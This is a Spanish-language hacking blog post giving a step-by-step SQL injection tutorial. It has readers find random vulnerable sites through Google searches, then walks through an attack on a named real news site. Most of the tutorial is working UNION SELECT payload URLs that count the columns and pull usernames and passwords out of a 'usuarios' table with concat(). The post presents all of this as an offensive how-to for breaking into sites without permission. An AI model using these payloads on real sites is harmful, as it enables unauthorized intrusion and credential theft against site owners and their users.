Tutorial sql injection - Electronik-Pro, Informatica, Noticas,Wordpress,Facebook,Hacking,Programas,Hosting,Dominios
Menu
» » » Tutorial sql injection

Hahahahaha estaba haciendo uno pero muy bueno
se me fue la luz
y no guardo pero hice este espero ser especifico en todo

....

Bueno are un ejemplo mas facil para que entiendan bien este tutorial!!! de mi brother Zero Bits

Primero que todo saludos a los hackxCrack
y principalmente a mi team Venezuela [R00t] Team
Je bueno vi que algunas personas no entendieron el tutorial de mi bro se los explicare

Primero que todo busquemos una victima

Yo la buscare alazar...
Vamos a google colocamos
noticias.php?id= notas.php?id= videos.php?id= etc...


nos saldran varias paginas en mi caso les pondre una de ejemplo =)

Bueno despues que entren a una de ellas

en mi caso consegui esta
http://www.diariopuerto.com/noticias.php?id=

a lo ultimo para ver si es vulnerable ponemos el '
quedaria asi

http://www.diariopuerto.com/noticias.php?id='

Nos saldra el siguiente error si es vulnerable


si nos sale ese error quitamos el ' y agregamos lo siguiente:

http://www.diariopuerto.com/noticias.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9

Asi hasta que nos tire los numeros en mi caso me tiro


les quedaria algo asi como en la imagen Cheesy

a uds les podria tirar 1 2 3 4 5 6 7 etc... jejeje por hay es donde sacaremos el user! y la pass!

Luego de esto vamos a lo ultimo y colocamos +from+usuarios
o usuario o email emails mails mail etc...

a mi me quedo asi http://www.diariopuerto.com/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios

Luego saquemos usuario y pass

http://www.diariopuerto.com/noticias.php?id=-1+union+select+usuario,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios
Se dan cuenta que cambie el 1 por usuario?
Bueno eso lo hago para que me tire el usuario luego se daran cuenta que les saldra el usuario =)

Para sacar la pass quitamos usuario y ponemos lo siguiente
concat(usuario,0x3a3a,pass)

quedaria asi

http://www.diariopuerto.com/noticias.php?id=-1+union+select+concat (usuario,0x3a3a,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios

Si con pass no les agarra intenten con password o clave , contraseña , claves etc....

aca nos dara pass y user Cheesy
Etiquetas: ,
en 11:34

0 comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)
 
Top